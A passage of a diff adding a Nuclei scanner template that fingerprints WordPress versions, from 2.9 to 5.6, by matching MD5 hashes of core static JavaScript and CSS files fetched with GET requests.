dsl: + - "(\"9ee110328baeee9a859f687924ec188a\" == md5(body))" + - type: dsl + name: 4.4.11 - 4.5.23 + dsl: + - "(\"0a1ee06ff6afbc7e8fa3aa042a88a9f2\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.11 + dsl: + - "(\"42c639526ec5b00732f0fb2e7b0d6a53\" == md5(body))" + - type: dsl + name: 4.3.12 - 4.3.25 + dsl: + - "(\"ed623af79c9fa06e85b845ee9421a111\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.15 + dsl: + - "(\"e3a253b2b4de734d3a11a3934be5dd65\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"924fa693f18b70b70c3f76ad13142bb2\" == md5(body))" + - type: dsl + name: 4.2.16 - 4.2.29 + dsl: + - "(\"81adc1a2adc7b15f6b5d5f151c880af3\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.18 + dsl: + - "(\"cb3deca0110cd39ea85a9a3b65d3162f\" == md5(body))" + - type: dsl + name: 4.1.19 - 4.1.32 + dsl: + - "(\"399743416c751e4d8b55d0398b69a675\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.18 + dsl: + - "(\"274729193f8ab542fd1979bba987db49\" == md5(body))" + - type: dsl + name: 4.0.19 - 4.0.32 + dsl: + - "(\"294d02cbc00b2310c0d5cf11c55a2ba0\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"332d2f8f3ee47dde343517e278928c52\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"140e4a74c6be70800fcef20fce9ae444\" == md5(body))" + - type: dsl + name: 3.7 - 3.8.33 + dsl: + - "(\"40092f2fbf830be89b8c4db99c9008b0\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"5c9bdc4d0fc3392189943f92ba6866d7\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"f61e2fe8bcc3e3a8f0d4b60db44e01a4\" == md5(body))" + - type: dsl + name: 4.9.2 - 5.2.9 + dsl: + - "(\"280263cbe063651d578398c8d4046cc8\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"5a54019a3f7e48c4249361115f8e41ec\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"877eec8c4cabdf1e49a86a93d77dc9c7\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.8.35 + dsl: + - "(\"f62250845c0562ef7cccb70d6522c468\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/editor.min.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"df77ac2726ff3184ff4a1e98ff5b2b7b\" == md5(body))" + - type: dsl + name: 4.7.3 - 4.7.19 + dsl: + - "(\"d23fdbfc8b0862fb2f292802ccb8a60d\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.2 + dsl: + - "(\"0ba8d7fa20e86f60b06176c72130bc4d\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"5a0be8ac9af0e5b7b226614028b43e98\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"6e13c98d1b89242683a6a1f0ffe3466e\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"0f147f511b5b2fc8655ab54e06d0cc67\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"703c7f914fa4199de132f72d5b753f80\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"a71c41c4b1c1f15084fe96f5f6d5e095\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"7af92b8e79eb872268168985e58f929b\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"a2c51851e5047cc75a589776eb121e3c\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"18350be6b3460d492e38b872b98096b7\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"4108ed5fd8a75d5f27078e93ea36a5a1\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"5d34ed8fe7919c5f5033866fcecdbe9a\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"b31212dac1e1d3e209ae744e60feec97\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"183b9588a66b858c3d0d3400bc656a49\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"b5d03f70f0d0cb3ab958a14fa05d429e\" == md5(body))" + - type: dsl + name: 4.9.2 + dsl: + - "(\"afb2c16bfc582737cabffd2957caf7aa\" == md5(body))" + - type: dsl + name: 4.9.3 - 5.0.11 + dsl: + - "(\"72b7a034ba598088d699dca7b02b6f0b\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"066c2527266f538d9d4acad0cbad13b7\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"9d022867c4e76a4d14c4c8b12b0765b9\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"4bbcdba80298c38da1020c92bead6dd3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/customize-preview-rtl.css" + matchers: + - type: dsl + name: 4.7.1 - 4.8.15 + dsl: + - "(\"514952b81c6dbef19b62b040e76484f9\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"aa094951adcb751c299c0bd6b88468a8\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"085c8450a198ee8d1e655b4864056777\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"f6c1fb0448444810959c4c9b94ef2cb0\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"2cb3162100ec30ee6d02f9b833de3b96\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"9f16dff935c6b68c4d43ee641795a4a9\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"36571e36be8cce5ed3cce6974430b474\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"d532290da96647a06230087dcfce2cee\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/imgareaselect/jquery.imgareaselect.js" + matchers: + - type: dsl + name: 4.3 - 4.9.4 + dsl: + - "(\"7a0e1bfc429252530cfb8318f53a5986\" == md5(body))" + - type: dsl + name: 3.7 - 4.2.29 + dsl: + - "(\"55a6b7fb4b1b287497d3fc30910e97ce\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"7958066469b0a567962a6355d9c5f817\" == md5(body))" + - type: dsl + name: 3.4.2 + dsl: + - "(\"6bc47583ef2dfc50dda136132e465b5f\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.1 + dsl: + - "(\"20f4d36a0d371e99909c5888b5903dcc\" == md5(body))" + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"1c8df6748c944b8bbbdc81b4774c590c\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"4295587170c3f16d76082f79ad9ff8e9\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"eb1bcd7d2f86645bb7265803ff189c95\" == md5(body))" + - type: dsl + name: 4.9.5 - 5.3.6 + dsl: + - "(\"63ec4a65e41151dfd5c85e88fc98a42c\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"58434a61140e1f5ffc4d8fdefbd8c185\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/wp-playlist.js" + matchers: + - type: dsl + name: 4.5 - 4.9.2 + dsl: + - "(\"aaf77f7481f419f5f8c46ae338820443\" == md5(body))" + - type: dsl + name: 4.0 - 4.4.24 + dsl: + - "(\"0ec99859384076f01ce50727d9bf18b3\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"49c9650815be34444bf6f171eaf9c7c2\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"bbb0981d3bb6131a999a42a42dcce185\" == md5(body))" + - type: dsl + name: 4.9.3 - 5.0.11 + dsl: + - "(\"b135057e7d04c299ca1e9b7d6055f4ed\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"92f80679cff32ca6b23ba0137731b5fb\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"ab1f84089f871d9658886c22a46ff080\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wplink.js" + matchers: + - type: dsl + name: 4.8.2 - 5.0.2 + dsl: + - "(\"6563181820c6b50a36ab7249198bdfea\" == md5(body))" + - type: dsl + name: 4.8 - 4.8.1 + dsl: + - "(\"fb20e3b0720c69a5bc3c6afff8e9db29\" == md5(body))" + - type: dsl + name: 4.7.6 - 4.7.19 + dsl: + - "(\"fd437907913d9ff37c7b68191f011363\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.5 + dsl: + - "(\"f955840763cec05064af68c3505fc98a\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"d1ca5593704c028cafa1e8bbd15f1b99\" == md5(body))" + - type: dsl + name: 4.6.7 - 4.6.20 + dsl: + - "(\"57ea74a73e7645136c0a9cc5abbd540a\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.6 + dsl: + - "(\"02348d98fc99d773c62a13fbcae96d68\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.9 + dsl: + - "(\"a7e67b7e7f5c322959dc66b35f1eda5b\" == md5(body))" + - type: dsl + name: 4.5.10 - 4.5.23 + dsl: + - "(\"9914791ca8d1c20816f66b3ee6a3c575\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.10 + dsl: + - "(\"3449cc137556743fcfa8270a1480c1e2\" == md5(body))" + - type: dsl + name: 4.4.11 - 4.4.24 + dsl: + - "(\"8c308b4742cb277f10492615392c7c7a\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.11 + dsl: + - "(\"bb9a4f6e9e3f4f0578a8216e47621127\" == md5(body))" + - type: dsl + name: 4.3.12 - 4.3.25 + dsl: + - "(\"72f75b21018ea87dde7985ac76412713\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.15 + dsl: + - "(\"5c88246db88479ae6c91651d19eaedea\" == md5(body))" + - type: dsl + name: 4.2.16 - 4.2.29 + dsl: + - "(\"624e27eeb0275c0d0856e22e23456e13\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.18 + dsl: + - "(\"5e6da10bd91d3bc1efdb71c105f8293c\" == md5(body))" + - type: dsl + name: 4.1.19 - 4.1.32 + dsl: + - "(\"134e15484be933063a7b5e72c201fd88\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.18 + dsl: + - "(\"cb46666ddb54cb5220c58c529b72b068\" == md5(body))" + - type: dsl + name: 4.0.19 - 4.0.32 + dsl: + - "(\"26500607f021bfaa5b1462e48c0ee7e5\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.19 + dsl: + - "(\"6641471b76e06bb7ca734cc620549d59\" == md5(body))" + - type: dsl + name: 3.9.20 - 3.9.33 + dsl: + - "(\"7d8dcae6fc67866464349fe714829901\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.21 + dsl: + - "(\"0d245718982f036887e169f79ceaba88\" == md5(body))" + - type: dsl + name: 3.8.22 - 3.8.35 + dsl: + - "(\"ffc517a6eb9a057222e152f58a9bf098\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.21 + dsl: + - "(\"3e14409d11ab45bb0f2c90e60978384f\" == md5(body))" + - type: dsl + name: 3.7.22 - 3.7.35 + dsl: + - "(\"f8a7e3f7491e199375f554e43e90f3e1\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"898be13a9020c5f02e3c35f94b173557\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"628548fcce211ffe2df025d71d5d1001\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"c1b068acfed8ce07852470f45b777a43\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"a8f124022bc4799e62c8b58f7db6989d\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"ad293791760966322c4dda8bc3329848\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"ccf54fa65c9b33ce8d2069bd8e3fa0c4\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"552e613b678cb04a27dab9122e721ea1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/postbox.min.js" + matchers: + - type: dsl + name: 4.6 - 5.0.11 + dsl: + - "(\"ddfe27f4efae737b800bad96ed8a0969\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"5bdffa0bca3aa2a832ebae263bb7f8cb\" == md5(body))" + - type: dsl + name: 4.4.1 - 4.4.24 + dsl: + - "(\"16f96070d454f607633aa9234c71fdd5\" == md5(body))" + - type: dsl + name: 4.4 + dsl: + - "(\"f07216a42e8487aea5738f6d71b5c7d3\" == md5(body))" + - type: dsl + name: 4.0 - 4.3.25 + dsl: + - "(\"8bf00b23dafb248f022d8b21693e0418\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.9.33 + dsl: + - "(\"1c663bd092f4cdf5f18344d493f3e20b\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"622b17ff667f50e0ed37db8993407e73\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"084dc85c20f5d1eb23a25441eaf714c7\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"1a7ea068ca15d7249279dfba54ff87ad\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"6219e9663ede786bff44bbf756b37c76\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"117e10b1b305c87fcdcd57b122188e55\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"fdc229b9e4beb2e87db12206402e4668\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"21c0429ec7415594fb008adc844d312d\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"3b99d039afbb7196baa78450c0a345e7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/admin-bar.min.js" + matchers: + - type: dsl + name: 4.6 - 5.0.11 + dsl: + - "(\"b2e733f0c117e30ac8974dcc69ab11d8\" == md5(body))" + - type: dsl + name: 4.3 - 4.5.23 + dsl: + - "(\"5bd4dfd347e0592a6bc8a5b9d6b070fc\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"78e3a64f61738d7bf52d7627e6260c23\" == md5(body))" + - type: dsl + name: 3.9 - 4.1.32 + dsl: + - "(\"0f3dc51f78d4b14bda30cb12cf062a7c\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"974be2549060c521272558a85b1ce3e1\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"725d72af8994225dc221211cd8120e8e\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"5f7b0e488ff4124ec5c4636186c2aaae\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"9c6442635f5e064bdb407b9f9cf0c8f4\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"3cd6f647119b7e18f59945d397c30c3f\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"c6ddf28ff950f8a3169a771f16b54b34\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"990a02987267bae995291b115857b5af\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"bb4c98a582dc6fccad187447328ca65a\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"f7d5140804d46ebae1b075dc92bc17a0\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"e3755ebeee513e368100f6764ff86863\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/modern/colors.css" + matchers: + - type: dsl + name: 5.5 + dsl: + - "(\"50133084c104b9bd63224ef52111c1e4\" == md5(body))" + - type: dsl + name: 5.5.1 - 5.6 + dsl: + - "(\"ddaab5f3a810428b4584c77ebcf5c3df\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/modern/colors-rtl.css" + matchers: + - type: dsl + name: 5.5 + dsl: + - "(\"34a4f9f830f96bbedd820af0e6d8eec5\" == md5(body))" + - type: dsl + name: 5.5.1 - 5.6 + dsl: + - "(\"c3a2c4a3828c0be8b3492aeaa66c5a70\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/modern/colors.scss" + matchers: + - type: dsl + name: 5.5 + dsl: + - "(\"98a7912681f8eed611164ea4bbba4a66\" == md5(body))" + - type: dsl + name: 5.5.1 - 5.6 + dsl: + - "(\"8aa858ffccaf9bc552d66ad90846f29c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/modern/colors-rtl.min.css" + matchers: + - type: dsl + name: 5.5 + dsl: + - "(\"b065fcf45b87cf191ba9ce41c99fa971\" == md5(body))" + - type: dsl + name: 5.5.1 - 5.6 + dsl: + - "(\"377da0d0eefd24ce110066de3ddd6baf\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/modern/colors.min.css" + matchers: + - type: dsl + name: 5.5 + dsl: + - "(\"bf9e3629961d4c7aaf4f6f4c84ba1d84\" == md5(body))" + - type: dsl + name: 5.5.1 - 5.6 + dsl: + - "(\"1aab7203b65801018a6f8ea5c0a91f44\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/media.min.js" + matchers: + - type: dsl + name: 4.6 - 5.0.11 + dsl: + - "(\"9be63adbaf5a5acfdbfdd555dc19777d\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + dsl: + - "(\"2e8efd83242126157ff0bffd5e249159\" == md5(body))" + - type: dsl + name: 4.0.1 - 4.1.32 + dsl: + - "(\"9f8b1a50cba5f06427ffe004043128c9\" == md5(body))" + - type: dsl + name: 4.0 + dsl: + - "(\"1c1a6cef0123a419a9fb9595c199fe78\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"3cc25c8aa2e2d4c4a164691cd70ddf73\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"fdac3c9c1567fea9f5f1fc1a2f29517e\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"7f667bc10fca561ca610d12be057d75f\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"ffccf4fd05e4c7b3bc1e9ef33c378ae1\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"7fe26c4e0d3b4b83cbc359066bb7bb37\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"149fa83dc3c3baaea6891e4ec34b6ad8\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"ae4f49117ed3eee9825a55bf439b49b8\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"45c47322e851a00e440a6e2d26174dcb\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"5ee094206a409c7b1f0e7ad0883b677a\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"dc89e6f924d1bea954cbadebbf88a08f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/edit-comments.min.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"de6d5d8283b0fb6a34f5c99569f910ef\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.19 + dsl: + - "(\"a219a0b276225bb3bacac8c2cb3776b4\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"3c16bfa9df88e42ccd3756bec32fe937\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"1e6e025c21f675863bc8afbd6b713386\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.25 + dsl: + - "(\"d23d7a162d5b1427fe16b04689041981\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"f56147d75a8ff4d0a9a62f88a5203d9a\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"f303c21d68b4ebff99aab2df75f81db9\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"e1d64d4023fe0facd55ee1600b50a15f\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"5cf4c4c0250888b7b97e1536f82bea01\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"7480780b3eca41e4e7e4a3fe6c63d43e\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"93ce03b7394bab13fc1bb343d87f00d2\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"97312b01a5aa72fef38a41da963abb49\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"0405cc7848d59145b6953e7fd9b1c419\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"b78b87670b43888624a5600101dc32c3\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"f51e509e450fe740e3295f175071b240\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"702d78113dd95f8b0bb2df8cb3192a3a\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"3387b2ca93f4eff740390930774cd4d2\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"039e69bcf2d3f162058b581e6430d0c9\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"e57cfccfba6062793096ebad5b2ed81c\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"3fb79dd105267303559830d7a93ae645\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/autosave.min.js" + matchers: + - type: dsl + name: 4.7 - 5.2.9 + dsl: + - "(\"c2366b7de7027d09661ecdde0c8d1025\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"0ad41a39a5590a02c5689f379b97afad\" == md5(body))" + - type: dsl + name: 4.4.1 - 4.5.23 + dsl: + - "(\"9f6cbf92fd682f09be0c265804c9ab67\" == md5(body))" + - type: dsl + name: 4.4 + dsl: + - "(\"5e1ea0845232846c1907d9fe70864d23\" == md5(body))" + - type: dsl + name: 4.1 - 4.3.25 + dsl: + - "(\"2eec8f2c408c881c6715ce0f682f3707\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"e4a56f032409c33f96d20ecfaed223e6\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"b5f51dcf394c4611b05725837d18dc2b\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"ca350f05d29aefd91692725945c944fa\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"d170f66997bf4dd0a595354633129133\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"7f88619a2907adba7943d1f3ff47b63b\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"0a5377f0fedb60c22a9d918cfd4e91ac\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"1ea6e59d88f83106e2ae3aff299d35df\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"aed85e244029fd1915a00f757c1a83ea\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"5ea21828b317f9b2ed50a6eef99afc46\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"0c1c912e31c1c4523af949b0a10608e9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wplink.min.js" + matchers: + - type: dsl + name: 4.8.2 - 5.0.2 + dsl: + - "(\"5c8ce7c9fc66234e60742bf8d3cf2ffb\" == md5(body))" + - type: dsl + name: 4.8 - 4.8.1 + dsl: + - "(\"06ddc3571523ab44448ba3566ea9e2d8\" == md5(body))" + - type: dsl + name: 4.7.6 - 4.7.19 + dsl: + - "(\"cff6fcc5b70652ee476588bc20884511\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.5 + dsl: + - "(\"59b4b46ffe146371aae9fcc50c7e1930\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"18f38030b7acd35250c60fe80ab73699\" == md5(body))" + - type: dsl + name: 4.6.7 - 4.6.20 + dsl: + - "(\"a3119f33e453860200fbacb09474f51e\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.6 + dsl: + - "(\"951dc23f64588e89e7dd9c13661a473d\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.9 + dsl: + - "(\"219a7c4fdeec0aef6655934410a5a587\" == md5(body))" + - type: dsl + name: 4.5.10 - 4.5.23 + dsl: + - "(\"ae3b50794ddcc3df84812d0cbc2855d4\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.10 + dsl: + - "(\"48078b35c0f544d16d7555da33ed6452\" == md5(body))" + - type: dsl + name: 4.4.11 - 4.4.24 + dsl: + - "(\"7d0ceb00ca46b627c036f834c7edd58a\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.11 + dsl: + - "(\"5318022592bd8ec613a3ec32e68d47e9\" == md5(body))" + - type: dsl + name: 4.3.12 - 4.3.25 + dsl: + - "(\"e0e239a4e8242880ed2d964e7a299579\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.15 + dsl: + - "(\"ce9cca5e1367cd6f5d4471f5604a4d69\" == md5(body))" + - type: dsl + name: 4.2.16 - 4.2.29 + dsl: + - "(\"474111b726b62007e9b5601b8d2f81bf\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.18 + dsl: + - "(\"1ca4d589307f12d1cb208a33e539ed23\" == md5(body))" + - type: dsl + name: 4.1.19 - 4.1.32 + dsl: + - "(\"3d2de6e6f70baf2d755cdc9c153474f0\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.18 + dsl: + - "(\"7d6840b991b131e9d5469c4b3fa912ba\" == md5(body))" + - type: dsl + name: 4.0.19 - 4.0.32 + dsl: + - "(\"a41d935025d74367609f773af6e31702\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.19 + dsl: + - "(\"5bae92ed3e8c6ee6ea8cc4e9c51efe27\" == md5(body))" + - type: dsl + name: 3.9.20 - 3.9.33 + dsl: + - "(\"67e7be5e708bcfc2f2d3cd31ed6f4c9c\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.21 + dsl: + - "(\"aa873353bbf46d2bcee1cc0ae2e9ebd0\" == md5(body))" + - type: dsl + name: 3.8.22 - 3.8.33 + dsl: + - "(\"a80a3c351b5307e73a9efa09e35f378f\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.21 + dsl: + - "(\"c9d7f5943044ff3a3a341c077ae58a42\" == md5(body))" + - type: dsl + name: 3.7.22 - 3.7.33 + dsl: + - "(\"d9e99f88c210e4e9b1ef2a508305705a\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"eb662536068707c335019d38236b441c\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"e532ee2cba4f82923a406d04a69827f2\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"caec3c62a9d482aea3a07473ba2fc765\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"e4c3fca615d78a5b856fa3ebbb4c676c\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"067b1858667ec737ba52026e37c22f77\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"f8a60311599ef36778d88259b9f3e9d2\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"b8124af933079872677671b4a77c8fe8\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"ddbfbec2edb0270430e1546d0df08fa6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/custom-background.min.js" + matchers: + - type: dsl + name: 4.7 - 5.2.7 + dsl: + - "(\"351f2eef1d5033d68e8982ea86167e3f\" == md5(body))" + - type: dsl + name: 3.7.34 - 4.6.19 + dsl: + - "(\"82d07f23593e578820b19fc9faad65a0\" == md5(body))" + - type: dsl + name: 3.7 - 3.8.33 + dsl: + - "(\"c0a9906e080e0d00b148d2353b5d6863\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"2efa9ea39be6f21776bf7ce5c28a094b\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.4 + dsl: + - 